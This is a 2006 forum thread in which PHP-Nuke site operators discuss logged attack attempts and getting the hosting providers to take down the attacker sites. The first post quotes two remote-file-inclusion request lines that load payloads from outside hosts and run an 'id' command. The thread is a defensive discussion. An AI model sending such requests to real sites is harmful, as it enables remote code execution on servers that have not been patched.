Login or Register  • Home • Downloads • Your Account • Forums •

Forum FAQ  •  Search  •  Memberlist  •  Usergroups  •  Profile  •  Log in to check your private messages  •  Log in AllMyGuests signin.php 404 error pages View next topic View previous topic   Web RavenPHPScripts (This Site)      Ravens PHP Scripts And Web Hosting Forum Index » Security - PHP Nuke Author Message Susann Moderator Joined: Dec 19, 2004 Posts: 3143 Location: Germany:Moderator German NukeSentinel Support Posted: Tue Feb 07, 2006 11:31 am I´m not using AllMyGuests anymore, but I noticed since I installed the 404 error page with mailfunction a lot of mails like this with IP´s from Brasil and some other countries too: Quote: ------------------ 201.58.68.105 /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.portodemoz.pa.gov.br/su.txt?bug0? User Agent = ------------------ 201.9.158.203 tried to load //include/write.php?dir=http://www.webzenxd.kit.net/tool25.txt?&cmd=id User Agent = Does this means someone is running that "D" tool or is this more automatically ? Of course I can ban Brasil completly but it isn´t the solution. How to stop this ? hitwalker Sells PC To Pay For Divorce Joined: Posts: 5661 Posted: Tue Feb 07, 2006 2:21 pm indeed my dear susann....im sure your glad now having my 404 huh... yes they are looking for ways to hack the place.. i maild the brazilian owners of ...www.webzenxd.kit...etc.... 2 days ago..and as you visit it you see they finaly took the site offline..... so it is usefull to mail providers and pulling websites down,even in brasil.. Susann Moderator Joined: Dec 19, 2004 Posts: 3143 Location: Germany:Moderator German NukeSentinel Support Posted: Tue Feb 07, 2006 3:43 pm Thanks Hitwalker, Yes, the 404 pages are helpful because you are good informed in time.I get my logfiles allways one day later. Because of the cmd and AllMyGuests I googeled and what me shocked is that this d tool can be found on several sites. hitwalker Sells PC To Pay For Divorce Joined: Posts: 5661 Posted: Tue Feb 07, 2006 3:50 pm yes i know....a lot were usualy hosted by yahoo (geocities) ,but they respond faster lately.... yesterday i got a big thank you from an american who had a hacked area on his site he didnt know of.. they uploaded the same stuff that was on the brasil website. he was gratefull for the warning..... point is,i didnt had to do that. if people would do it more often then there would be less addresses to abuse. Susann Moderator Joined: Dec 19, 2004 Posts: 3143 Location: Germany:Moderator German NukeSentinel Support Posted: Tue Feb 07, 2006 4:36 pm Quote: if people would do it more often then there would be less addresses to abuse. Exact that´s the problem.The most people are to lazy or they hesitate to do it because they really don´t know what´s going on. hitwalker Sells PC To Pay For Divorce Joined: Posts: 5661 Posted: Tue Feb 07, 2006 4:54 pm I had another one susann,this one was hosted at 100free. I wrote them ... (names etc ...are taken out) Contact Name: hitwalker Support Issue: please remove the following account. They just replied with: This site has been removed from our hosting services for violations of our TOS (Terms of Service). Additionally, all sites associated with the email address used to sign up for hosting have been removed. Thank you for bringing this to our attention. Nice huh..... Susann Moderator Joined: Dec 19, 2004 Posts: 3143 Location: Germany:Moderator German NukeSentinel Support Posted: Tue Feb 07, 2006 8:22 pm Nice. It's as simple as that Susann Moderator Joined: Dec 19, 2004 Posts: 3143 Location: Germany:Moderator German NukeSentinel Support Posted: Fri Feb 10, 2006 9:37 pm Quote: m sure your glad now having my 404 huh Well, it´s a never ending story with the signin.php. There must be any reason why I received at the moment a lot of this kind of mails. hitwalker Sells PC To Pay For Divorce Joined: Posts: 5661 Posted: Fri Feb 10, 2006 10:28 pm yeah i get them to....but its getting less now..also getting some profile.php....lol but as you saw by now susann how busy they are.... but i believe most of them are automatic scripts that pull website url like ours from scripts....then the let a script run with different proxies. ive seen that a lot by now,same url over and over like 4 or 5 times within 1 minutes with 3 or 4 different ip's. Susann Moderator Joined: Dec 19, 2004 Posts: 3143 Location: Germany:Moderator German NukeSentinel Support Posted: Sat Feb 11, 2006 5:45 am Well, I visit some hackers site after the first email and I thought first this could be the reason. But I found about the "D" tool 2 interesting articles one is from isc.sans.org "We have received additional reports of attempted site defacement leveraging the same tool suite referenced above but targeting PHP-Nuke sites specifically." hitwalker Sells PC To Pay For Divorce Joined: Posts: 5661 Posted: Sat Feb 11, 2006 6:27 am well thats all they do... most people dont even know whats going on on their server.. and we have both ways covered now as i like to believe... or we get a wanna be hacker attack and sentinel kills him on site or they call for a page i dont have and i get the 404 and i kill them personaly Display posts from previous:   All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 Year  Oldest FirstNewest First        Ravens PHP Scripts And Web Hosting Forum Index » Security - PHP Nuke  Jump to:  Select a forum Read Me First!!!----------------Board Rules and Regulations Web Hosting Services----------------RWH GeneralRWH Pre Sale QuestionsRWH Client Center Application OnlyRWH OtherFAQ - PHP5 w/phpSuExec Conversion From PHP4PHP5 Conversion Issues From PHP4 RavenNuke(tm) Programming Standards/Approaches/Philosophy----------------RavenNuke / Raven CMS CMS WikiSecurity IssuesConverting/Creating BlocksConverting/Creating ModulesConverting/Creating ThemesConverting/Creating OtherConverting/Creating General DiscussionCertification - Submit Scripts For RavenNuke(tm) CertificationCertification - Modules, Blocks, Other Scripts/Applications Converted For RavenNuke(tm)Certification - All Discussion RavenNuke(tm) v2.5x----------------RavenNuke(tm) v2.5x RavenNuke(tm) v2.4x----------------v2.4 RN Announcementsv2.4 RN Documentationv2.4 RN Issues RavenNuke(tm) v2.3x----------------v2.3 RN Announcementsv2.3 RN Quick Fixesv2.3 RN Issuesv2.3 RN Documentationv2.3 RN Feedback/Suggestionsv2.30.01 RN Security Issuesv2.30.01 RN New Installation Issuesv2.30.01 RN Upgrade Issuesv2.30.01 RN All Other Issues RavenNuke(tm) v2.2x----------------RN v2.20.00 - AnnouncementsRN v2.20.00 - All IssuesRN v2.20.00 - Feedback RavenNuke(tm) Addons----------------FCKeditor/WYSIWYG IssuesnukeFeed/FeedCreatorForum Attachment ModnukeSEOShortLinks/TegoNukeNukePie/SimplePieeCommerce Site Specific Stuff----------------READ ME FIRSTAnnouncementsRaven's v7.0 Customized DistroHack Attempt ScriptRaven's Customized Distribution PacksBUGS/FIXES - Raven's v7.3 Customized DistroCache Lite Admin ModuleNuke Tool Box (TM)Captcha SecurityRaven's RavenNuke(tm) v1.x DistroRaven's RavenNuke(tm) v2.00.00 - v2.02.00 DistroWYSIWYG - Raven's RavenNuke(tm) v2.x DistroRaven's Collapsing Forums BlockGT - Raven's RavenNuke(tm) v2.x DistroRaven's RavenNuke(tm) v2.02.02 DistroPost Fixes - Raven's RavenNuke(tm) v2.02.02 DistroPublic Testing of RavenNuke(tm) v2.10.00HtAccesserIssues/Problems With This Site Security----------------NukeSentinel(tm) Country and IP2Country UpdatesSecurity - PHP NukeSecurity - OtherNukeSentinel(tm) v2.6.xNukeSentinel(tm) v2.5.xNukeSentinel(tm) v2.4.xNukeSentinel(tm)NukeSentinel(tm) Bug ReportsNukeSentinel(tm) Enhancement RequestsNukeSentinel(tm) AnnouncementsPHP-Nuke Patched Series By Chatserv Information About Forums----------------PHPBBBB2NukePunBB PHP-Portal Project (Not General phpnuke!)----------------AnnouncementsDesign Discussions Scripts - General----------------Bug FixesGeneral/Other StuffHow To'sInstallation HelpPost Installation HelpGT - Next Gen and StandardSeeking applications ...ThemesBlocksModulesMaking Nuke Efficientphpnuke 8.1phpnuke 8.0phpnuke 7.9phpnuke 7.8phpnuke 7.7phpnuke 7.6phpnuke 7.6 Bugs/Fixesphpnuke 7.5phpnuke 7.4phpnuke 7.3phpnuke 7.2phpnuke 7.1phpnuke 7.0phpnuke 6.9phpnuke 6.8Bug Fixes for phpnuke 6.5phpnuke 6.5Gallery/Gallery2CNB Your AccountBrowser Specific IssuesUpgrading NukeNuke Treasury NSN Scripts----------------NSN NewsNSN GroupsNSN OtherNSN Gr Downloads - a.k.a NukeDepositoryNSN NukeProject Other CMS/Portal Applications----------------Post NukeNuke PlatinumNuke Evolution PHPBB----------------Stand Alonew/Nuke 6.5w/Nuke 6.9BBtoNuke ModsBBtoNuke General Programming - Server Help----------------PHPMySQLFor HireApacheHTMLCSSJavaScriptServer Help Guestbook Application (KISGB)----------------KISGB General Support Stock Quote Application (KISSQ)----------------KISSQ General Support RavenNuke(tm) v2.10.01----------------RN v2.10.01 - All IssuesRN v2.10.01 - Feedback RavenNuke(tm) v2.10.00----------------RN AnnouncementsRN FAQRN Bug FixesRN Not BugsRN Documentation Issues/SuggestionsRN Enhancement Requests and SuggestionsRN NSN Groups IssuesRN Themes IssuesRN NukeSentinel(tm) issuesRN Installer/Setup IssuesRN Bug Reports - Other IssuesRN Conversion Issues From v2.02RN Conversion Issues From Standard phpNukeRN The Good, The Bad, The Ugly 6.5 Hacks----------------Old Articles Hack Nuke News Module Hack To Allow Ordering of Articles----------------News Module Hack - AnnouncementsNews Module Hack - BugsNews Module Hack - Enhancement RequestsNews Module Hack - Discussion Other Stuff----------------Other - DiscussionOther - Sites To VisitOther - Chit ChatOther - PoliticsOther - Movie ReviewsOther - Humor Religion----------------Religion - GeneralPrayer/Praise Requests Potpourri----------------Rants & Raves Private----------------Reading - AnnouncementsReading - Digital BooksReading - Hard/Soft cover BooksReading - Digital MagazinesReading - Printed Magazines  View next topic View previous topic You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum Forums ©

All logos and trademarks in this site are property of their respective owner.
The comments are property of their posters, all the rest © 2002-2011 by Raven

You can syndicate our news using the file



Website engines core code is © copyright by PHP-Nuke but has been heavily patched and modified by myself and others.
PHP-Nuke is a free software released under the GNU/GPL.


:: fisubice phpbb2 style by Daz :: PHP-Nuke theme by www.nukemods.com :::: fisubice Theme Modified by the RavenNuke™ Team ::
:: :: ::

zerosum